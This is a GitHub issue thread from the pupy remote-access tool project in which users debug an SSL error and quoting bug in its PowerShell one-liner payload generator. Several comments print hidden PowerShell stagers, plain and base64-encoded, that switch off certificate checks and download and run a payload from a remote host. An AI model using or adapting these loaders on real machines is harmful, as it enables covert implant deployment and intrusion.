### ISSUE TITLE
Bad SSL certificate with pupygen

### ISSUE THREAD

**Issue by dkfx** [n1nj4sec/pupy#360]
I had pupy up and running a few weeks ago but I did a fresh install and now I am seeing an issue with the SSL certificate when using pupygen:

```
root@ip:/home/ubuntu/pupy/pupy# ./pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port 443 connect --host x.x.x.x
[I] Credentials password: 
[+] copy/paste one of these one-line loader to deploy pupy without writing on the disk :
 --- 
powershell.exe -w hidden -noni -nop -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://x.x.x.x:443/xxxx')
 --- 
powershell.exe -w hidden -noni -nop -enc W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrID0geyR0cnVlfTtpZXgoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi9ub3BlITo0NDMvYWRzZmFzZGYnKQ==
 --- 
Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy
 --- 
[+] Started http server on 0.0.0.0:443 
[+] waiting for a connection ...
```
If I do a curl request to the endpoint I get an invalid SSL error:
```
User$ curl -v https://x.x.x.x:443/xxxx
*   Trying x.x.x.x...
* TCP_NODELAY set
* Connected to x.x.x.x (x.x.x.x) port 443 (#0)
* WARNING: using IP address, SNI is being disabled by the OS.
* Internal SSL engine error encountered during the SSL handshake
* Curl_http_done: called premature == 1
* Closing connection 0
curl: (35) Internal SSL engine error encountered during the SSL handshake
```
Previously the connection was over http and not https. Even if I specify the http transport I am still getting a https endpoint with an invalid (self signed, I assume) cert. How can you disable https in favor of http?

**Comment by AlessandroZ** [comment]
I have noticed a problem on the ps1 oneliner two. It's not a problem of certificat, it's because, two commands are prompt (one using base64 encoding, and one in clear text). The one in cleartext does not work because  quotes are missing after the "-c" option. The encoding string work by the way. 

And another problem, it's not possible to use another protocol than ssl (no ssl options are provided [here](https://github.com/n1nj4sec/pupy/blob/master/pupy/pupygen.py#L527)) and it's set to True by default [here](https://github.com/n1nj4sec/pupy/blob/master/pupy/pupylib/payloads/ps1_oneliner.py#L156). 

So we should change it a little bit.

**Comment by n1nj4sec** [comment]
It works, it's just there is no 404 returned in case the path is unknown and it returns a ssl error.
try : ``` curl -v -k https://x.x.x.x:xxxx/eiloShaegae1 ```

**Comment by AlessandroZ** [comment]
Launching the command line from a powershell console I got this error: 

```
PS C:\Windows\System32\WindowsPowerShell\v1.0> powershell.exe -w hidden -noni -n
op -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$
true};iex(New-Object System.Net.WebClient).DownloadString('https://192.168.0.15:
8080/eiloShaegae1')
powershell.exe : ScriptBlock ne doit être spécifié qu'en tant que valeur du
paramètre Command.
Au caractère Ligne:1 : 1
+ powershell.exe -w hidden -noni -nop -c
[System.Net.ServicePointManager]::ServerC ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~
    + CategoryInfo          : InvalidArgument : (:) [], ParameterBindingExcept
   ion
    + FullyQualifiedErrorId : IncorrectValueForCommandParameter

Exception lors de l'appel de «DownloadString» avec «1» argument(s): «La
connexion sous-jacente a été fermée: Impossible d'établir une relation de
confiance pour le canal sécurisé SSL/TLS.»
Au caractère Ligne:1 : 120
+ powershell.exe -w hidden -noni -nop -c
[System.Net.ServicePointManager]::ServerC ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

PS C:\Windows\System32\WindowsPowerShell\v1.0>
```
Adding double quotes between the arg of the -c option solve this problem. 

However, it worked from a cmd console.

**Comment by alxchk** [comment]
While this doesn't have direct relation to the issue, I would like to notice, that some time ago I had added alternate way to serve payloads -  [![py1liner](https://asciinema.org/a/602e0zng7hl8yq7z86ydnligd.png)](https://asciinema.org/a/602e0zng7hl8yq7z86ydnligd)

I wrote this code because in my environment it's quite common to have systems where egress connections are limited to one single port, and running additional listener simply doens't work. This functionality have both advantages and disadvantages. The generation code unified and simplified. But http server fully depends on pupy server type. I.e. It's not possible to mix HTTPS (ssl) payload handler with HTTP server.

**Comment by dkfx** [comment]
I am able to get the payload delivered using the base64 encoded powershell command but the plaintext command returns the same error for me as @AlessandroZ. I had to specify the transport as http however before I could get it to generate.

If I was using SSL I received this error:
````
root@ip:/home/ubuntu/pupy/pupy# ./pupygen.py -f ps1_oneliner --ps1-oneliner-listen-port 443 
 connect --host x.x.x.x
here
ERROR:root:ThreadedHTTPServer instance has no attribute 'tmp_cert_path'
Traceback (most recent call last):
  File "./pupygen.py", line 545, in <module>
    pupygen(parser.parse_args(), config)
  File "./pupygen.py", line 529, in pupygen
    serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
  File "/home/ubuntu/pupy/pupy/pupylib/payloads/ps1_oneliner.py", line 159, in serve_ps1_payload
    server = ThreadedHTTPServer((ip, port),PupyPayloadHTTPHandler)
  File "/usr/lib/python2.7/SocketServer.py", line 420, in __init__
    self.server_close()
  File "/home/ubuntu/pupy/pupy/pupylib/payloads/ps1_oneliner.py", line 152, in server_close
    os.unlink(self.tmp_cert_path)
AttributeError: ThreadedHTTPServer instance has no attribute 'tmp_cert_path'
ThreadedHTTPServer instance has no attribute 'tmp_cert_path'
````

**Comment by n1nj4sec** [comment]
wow @alxchk your idea of having the http_wrapper transport layer on the server side only is awesome ! At first quick review I thought it was a remake of the http transport with an option to wrap any other transport within, but it's actually not it's a server layer to support http and an additional pupy transport ! (but of course not http)
The only thing bad that I see could happen is having a packet starting with GET/POST/HEAD, when you use crypto and have random data you may be unlucky \o/ ^^
